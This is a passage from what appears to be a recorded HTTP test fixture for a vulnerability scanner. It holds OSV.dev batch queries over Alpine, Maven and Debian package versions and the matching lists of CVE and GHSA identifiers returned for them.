"Alpine:v3.21", "name": "expat" }, "version": "2.6.4-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libffi" }, "version": "3.4.6-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libfontenc" }, "version": "1.1.8-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libgcrypt" }, "version": "1.10.3-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libgpg-error" }, "version": "1.51-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libidn2" }, "version": "2.3.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gettext" }, "version": "0.22.5-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libksba" }, "version": "1.6.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "openldap" }, "version": "2.6.8-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "ncurses" }, "version": "6.5_p20241006-r3" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libpng" }, "version": "1.6.44-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "cyrus-sasl" }, "version": "2.1.28-r8" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "openssl" }, "version": "3.3.2-r4" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libtasn1" }, "version": "4.19.0-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libunistring" }, "version": "1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "mkfontscale" }, "version": "1.2.3-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "musl" }, "version": "1.2.5-r8" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "musl-locales" }, "version": "0.1.0-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "musl-locales" }, "version": "0.1.0-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "musl" }, "version": "1.2.5-r8" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "ncurses" }, "version": "6.5_p20241006-r3" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "nettle" }, "version": "3.10-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "npth" }, "version": "1.6-r4" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "openssl" }, "version": "3.3.2-r4" }, { "package": { "ecosystem": "Maven", "name": "org.apache.avro:avro" }, "version": "1.9.2" }, { "package": { "ecosystem": "Maven", "name": "org.apache.commons:commons-compress" }, "version": "1.21" }, { "package": { "ecosystem": "Maven", "name": "org.apache.commons:commons-configuration2" }, "version": "2.8.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.commons:commons-lang3" }, "version": "3.12.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.commons:commons-math3" }, "version": "3.6.1" }, { "package": { "ecosystem": "Maven", "name": "org.apache.commons:commons-text" }, "version": "1.10.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.curator:curator-client" }, "version": "5.2.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.curator:curator-framework" }, "version": "5.2.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.curator:curator-recipes" }, "version": "5.2.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop.thirdparty:hadoop-shaded-guava" }, "version": "1.2.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop.thirdparty:hadoop-shaded-protobuf_3_21" }, "version": "1.2.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-annotations" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-auth" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-client" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-common" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-hdfs-client" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-mapreduce-client-common" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-mapreduce-client-core" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-mapreduce-client-jobclient" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-yarn-api" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-yarn-client" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.hadoop:hadoop-yarn-common" }, "version": "3.4.0" }, { "package": { "ecosystem": "Maven", "name": "org.apache.httpcomponents:httpclient" }, "version": "4.5.13" }, { "package": { "ecosystem": "Maven", "name": "org.apache.httpcomponents:httpcore" }, "version": "4.4.13" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-admin" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-client" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-common" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-core" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-crypto" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-identity" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-server" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-simplekdc" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerb-util" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerby-asn1" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerby-config" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerby-pkix" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerby-util" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:kerby-xdr" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.apache.kerby:token-provider" }, "version": "2.0.3" }, { "package": { "ecosystem": "Maven", "name": "org.codehaus.mojo:animal-sniffer-annotations" }, "version": "1.17" }, { "package": { "ecosystem": "Maven", "name": "org.codehaus.woodstox:stax2-api" }, "version": "4.2.1" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty.websocket:websocket-api" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty.websocket:websocket-client" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty.websocket:websocket-common" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-client" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-http" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-io" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-security" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-servlet" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-util" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-util-ajax" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-webapp" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.eclipse.jetty:jetty-xml" }, "version": "9.4.53.v20231009" }, { "package": { "ecosystem": "Maven", "name": "org.jctools:jctools-core" }, "version": "3.1.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline-builtins" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline-reader" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline-remote-ssh" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline-remote-telnet" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline-style" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline-terminal" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline-terminal-jansi" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.jline:jline-terminal-jna" }, "version": "3.9.0" }, { "package": { "ecosystem": "Maven", "name": "org.slf4j:slf4j-api" }, "version": "1.7.36" }, { "package": { "ecosystem": "Maven", "name": "org.slf4j:slf4j-reload4j" }, "version": "1.7.36" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "p11-kit" }, "version": "0.25.5-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "p11-kit" }, "version": "0.25.5-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "pinentry" }, "version": "1.3.1-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "pax-utils" }, "version": "1.3.8-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "skalibs" }, "version": "2.14.3.0-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "sqlite" }, "version": "3.47.1-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "busybox" }, "version": "1.37.0-r9" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "tzdata" }, "version": "2024b-r1" }, { "package": { "ecosystem": "Maven", "name": "unknown:unknown" }, "version": "unknown" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "utmps" }, "version": "0.1.2.3-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "zlib" }, "version": "1.3.1-r2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Scanning_java_image_with_some_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 10135 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-72hv-8253-57qq", "modified": "2026-03-04T15:06:51.908001Z" }, { "id": "GHSA-h46c-h94j-95f3", "modified": "2026-02-04T03:44:39.385253Z" }, { "id": "GHSA-wf8f-6423-gfxg", "modified": "2026-02-04T02:17:21.257294Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-735f-pc8j-v9w8", "modified": "2026-02-04T03:34:00.411610Z" } ] }, {}, { "vulns": [ { "id": "GHSA-gvpg-vgmx-xg6w", "modified": "2026-02-04T03:20:13.834799Z" }, { "id": "GHSA-xwmg-2g98-w7v9", "modified": "2026-02-04T04:02:18.737097Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-wxr5-93ph-8wr9", "modified": "2026-02-04T02:26:01.067608Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-cfxw-4h78-h7fw", "modified": "2026-02-04T04:29:28.819325Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-12243", "modified": "2026-02-24T08:30:42.520717Z" }, { "id": "ALPINE-CVE-2025-14831", "modified": "2026-02-24T08:30:41.701341Z" }, { "id": "ALPINE-CVE-2025-32988", "modified": "2026-02-24T08:16:54.971657Z" }, { "id": "ALPINE-CVE-2025-32989", "modified": "2026-02-24T08:17:41.640619Z" }, { "id": "ALPINE-CVE-2025-32990", "modified": "2026-02-24T08:17:41.697467Z" }, { "id": "ALPINE-CVE-2025-6395", "modified": "2026-02-24T08:17:38.778605Z" }, { "id": "ALPINE-CVE-2025-9820", "modified": "2026-02-24T08:17:41.731734Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-68972", "modified": "2026-01-10T11:24:45.922788Z" }, { "id": "ALPINE-CVE-2025-68973", "modified": "2026-01-08T11:18:08.318838Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-3p8m-j85q-pgmj", "modified": "2026-02-04T02:23:33.973208Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-5jpm-x58v-624v", "modified": "2026-02-04T02:17:39.757688Z" }, { "id": "GHSA-84h7-rjj3-6jx4", "modified": "2026-02-04T03:25:14.697311Z" }, { "id": "GHSA-fghv-69vj-qj49", "modified": "2026-02-04T03:04:04.888405Z" } ] }, { "vulns": [ { "id": "GHSA-prj3-ccx8-p6x4", "modified": "2026-02-04T02:26:22.855609Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-jq43-27x9-3v86", "modified": "2026-02-04T04:27:03.146166Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-389x-839f-4rhx", "modified": "2026-02-04T04:31:00.174857Z" }, { "id": "GHSA-xq3w-v528-46rv", "modified": "2026-02-04T03:40:54.362888Z" } ] }, { "vulns": [ { "id": "GHSA-4g8c-wm8x-jfhw", "modified": "2026-02-04T02:54:33.253775Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-12797", "modified": "2025-12-03T22:55:03.634026Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9231", "modified": "2025-12-03T23:00:26.184987Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-8176", "modified": "2025-12-03T22:57:51.246966Z" }, { "id": "ALPINE-CVE-2025-59375", "modified": "2025-12-03T22:59:58.939558Z" }, { "id": "ALPINE-CVE-2026-24515", "modified": "2026-02-06T11:22:51.413545Z" }, { "id": "ALPINE-CVE-2026-25210", "modified": "2026-03-13T06:29:27.213127Z" }, { "id": "ALPINE-CVE-2026-32777", "modified": "2026-03-18T15:30:30.767674Z" }, { "id": "ALPINE-CVE-2026-32778", "modified": "2026-03-18T15:30:27.849300Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-64505", "modified": "2025-12-08T15:11:42.598503Z" }, { "id": "ALPINE-CVE-2025-64506", "modified": "2025-12-08T15:14:01.131553Z" }, { "id": "ALPINE-CVE-2025-64720", "modified": "2025-12-08T15:14:12.627370Z" }, { "id": "ALPINE-CVE-2025-65018", "modified": "2025-12-08T15:14:18.487828Z" }, { "id": "ALPINE-CVE-2025-66293", "modified": "2025-12-08T15:17:27.019257Z" }, { "id": "ALPINE-CVE-2026-22695", "modified": "2026-01-22T19:30:03.621725Z" }, { "id": "ALPINE-CVE-2026-22801", "modified": "2026-01-22T19:30:04.012462Z" }, { "id": "ALPINE-CVE-2026-25646", "modified": "2026-02-24T12:00:36.302208Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-12797", "modified": "2025-12-03T22:55:03.634026Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9231", "modified": "2025-12-03T23:00:26.184987Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-12133", "modified": "2025-12-03T22:55:00.302559Z" }, { "id": "ALPINE-CVE-2025-13151", "modified": "2026-01-13T09:30:10.551660Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-12797", "modified": "2025-12-03T22:55:03.634026Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9231", "modified": "2025-12-03T23:00:26.184987Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, { "vulns": [ { "id": "GHSA-r7pg-v2c8-mfg3", "modified": "2026-02-04T03:14:24.930542Z" }, { "id": "GHSA-rhrv-645h-fjfh", "modified": "2026-02-04T02:43:50.522457Z" } ] }, { "vulns": [ { "id": "GHSA-4265-ccf5-phj5", "modified": "2026-02-04T03:44:24.716817Z" }, { "id": "GHSA-4g9r-vxhx-9pgx", "modified": "2026-02-04T02:38:20.882397Z" } ] }, { "vulns": [ { "id": "GHSA-9w38-p64v-xpmv", "modified": "2026-02-04T03:05:15.000909Z" }, { "id": "GHSA-xjp4-hw94-mvp5", "modified": "2026-02-04T04:32:34.354092Z" } ] }, { "vulns": [ { "id": "GHSA-j288-q9x7-2f5v", "modified": "2026-02-04T03:18:02.851501Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-qh8g-58pp-2wxh", "modified": "2026-02-04T05:13:21.910792Z" }, { "id": "GHSA-wjpw-4j6x-6rwh", "modified": "2026-03-09T11:29:07.402944Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-29087", "modified": "2025-11-19T06:21:22.290875Z" }, { "id": "ALPINE-CVE-2025-29088", "modified": "2025-11-19T06:21:22.419722Z" }, { "id": "ALPINE-CVE-2025-3277", "modified": "2025-11-19T06:21:22.993026Z" }, { "id": "ALPINE-CVE-2025-6965", "modified": "2026-02-05T02:19:39.445651Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, {}, {} ] } headers: Content-Length: - "10135" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 12957 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Debian:10", "name": "adduser" }, "version": "3.118" }, { "package": { "ecosystem": "Debian:10", "name": "apt" }, "version": "1.8.2.3" }, { "package": { "ecosystem": "Debian:10", "name": "base-files" }, "version": "10.3+deb10u13" }, { "package": { "ecosystem": "Debian:10", "name": "base-passwd" }, "version": "3.5.46" }, { "package": { "ecosystem": "Debian:10", "name": "bash" }, "version": "5.0-4" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "1:2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ca-certificates" }, "version": "20200601~deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "coreutils" }, "version": "8.30-3" }, { "package": { "ecosystem": "Debian:10", "name": "dash" }, "version": "0.5.10.2-5" }, { "package": { "ecosystem": "Debian:10", "name": "debconf" }, "version": "1.5.71+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "debian-archive-keyring" }, "version": "2019.1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "debianutils" }, "version": "4.8.6.1" }, { "package": { "ecosystem": "Debian:10", "name": "diffutils" }, "version": "1:3.7-3" }, { "package": { "ecosystem": "Debian:10", "name": "dpkg" }, "version": "1.19.8" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "findutils" }, "version": "4.6.0+git+20190209-2" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "gnupg2" }, "version": "2.2.12-1+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "grep" }, "version": "3.3-1" }, { "package": { "ecosystem": "Debian:10", "name": "gzip" }, "version": "1.9-3+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "hostname" }, "version": "3.21" }, { "package": { "ecosystem": "Debian:10", "name": "init-system-helpers" }, "version": "1.56+nmu1" }, { "package": { "ecosystem": "Debian:10", "name": "acl" }, "version": "2.2.53-4" }, { "package": { "ecosystem": "Debian:10", "name": "apt" }, "version": "1.8.2.3" }, { "package": { "ecosystem": "Debian:10", "name": "attr" }, "version": "1:2.4.48-4" }, { "package": { "ecosystem": "Debian:10", "name": "audit" }, "version": "1:2.8.4-3" }, { "package": { "ecosystem": "Debian:10", "name": "audit" }, "version": "1:2.8.4-3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "bzip2" }, "version": "1.0.6-9.2~deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "glibc" }, "version": "2.28-10+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "glibc" }, "version": "2.28-10+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "libcap-ng" }, "version": "0.7.9-2" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.5" }, { "package": { "ecosystem": "Debian:10", "name": "cdebconf" }, "version": "0.249" }, { "package": { "ecosystem": "Debian:10", "name": "expat" }, "version": "2.2.6-2+deb10u6" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "libffi" }, "version": "3.2.1-9" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "1:8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "libgcrypt20" }, "version": "1.8.4-5+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "gdbm" }, "version": "1.18.1-4" }, { "package": { "ecosystem": "Debian:10", "name": "gmp" }, "version": "2:6.1.2+dfsg-4+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "gnutls28" }, "version": "3.6.7-4+deb10u10" }, { "package": { "ecosystem": "Debian:10", "name": "libgpg-error" }, "version": "1.35-1" }, { "package": { "ecosystem": "Debian:10", "name": "nettle" }, "version": "3.4.1-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "libidn2" }, "version": "2.0.5-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "lz4" }, "version": "1.8.3-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "xz-utils" }, "version": "5.2.4-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "nettle" }, "version": "3.4.1-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "p11-kit" }, "version": "0.23.15-2+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pcre3" }, "version": "2:8.39-12" }, { "package": { "ecosystem": "Debian:10", "name": 